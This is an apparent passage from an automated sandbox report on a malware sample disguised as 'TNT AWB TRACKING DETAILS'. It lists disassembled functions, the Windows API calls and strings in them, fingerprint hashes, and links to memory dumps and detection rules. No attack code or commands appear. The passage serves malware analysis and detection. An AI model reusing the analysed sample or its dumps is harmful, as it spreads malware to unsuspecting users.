                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                      Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00464B28
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                      • _wcslen.LIBCMT ref: 00464C28
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                      • _wcslen.LIBCMT ref: 00464CBA
                                      • _wcslen.LIBCMT ref: 00464CD0
                                      • _wcslen.LIBCMT ref: 00464CEF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$Directory$CurrentSystem
                                      • String ID: D
                                      • API String ID: 1914653954-2746444292
                                      • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                      • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                      Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                      • API String ID: 3832890014-4202584635
                                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                      Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                      • GetFocus.USER32 ref: 0046A0DD
                                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessagePost$CtrlFocus
                                      • String ID: 0
                                      • API String ID: 1534620443-4108050209
                                      • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                      • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                      Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?), ref: 004558E3
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$CreateDestroy
                                      • String ID: ,$tooltips_class32
                                      • API String ID: 1109047481-3856767331
                                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                      Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                      • GetMenuItemCount.USER32(?), ref: 00468C45
                                      • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                      • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                      • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                      • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                      • GetMenuItemCount.USER32 ref: 00468CFD
                                      • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                      • GetCursorPos.USER32(?), ref: 00468D3F
                                      • SetForegroundWindow.USER32(?), ref: 00468D49
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                      • String ID: 0
                                      • API String ID: 1441871840-4108050209
                                      • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                      • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                      • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                      • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                      Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                      • __swprintf.LIBCMT ref: 00460915
                                      • __swprintf.LIBCMT ref: 0046092D
                                      • _wprintf.LIBCMT ref: 004609E1
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 3631882475-2268648507
                                      • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                      • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                      Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                      • SendMessageW.USER32 ref: 00471740
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                      • SendMessageW.USER32 ref: 0047184F
                                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                      • String ID:
                                      • API String ID: 4116747274-0
                                      • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                      • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                      • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                      • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                      Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                      • _wcslen.LIBCMT ref: 00461683
                                      • __swprintf.LIBCMT ref: 00461721
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                      • GetDlgCtrlID.USER32(?), ref: 00461869
                                      • GetWindowRect.USER32(?,?), ref: 004618A4
                                      • GetParent.USER32(?), ref: 004618C3
                                      • ScreenToClient.USER32(00000000), ref: 004618CA
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                      • String ID: %s%u
                                      • API String ID: 1899580136-679674701
                                      • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                      • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                      • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                      • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                      Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                      • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu$Sleep
                                      • String ID: 0
                                      • API String ID: 1196289194-4108050209
                                      • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                      • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                      • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                      • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                      Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0043143E
                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                      • SelectObject.GDI32(00000000,?), ref: 00431466
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                      • String ID: (
                                      • API String ID: 3300687185-3887548279
                                      • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                      • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                      • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                      • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                      Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 1976180769-4113822522
                                      • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                      • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                      • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                      • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                      Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                      • String ID:
                                      • API String ID: 461458858-0
                                      • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                      • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                      • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                      • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                      Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
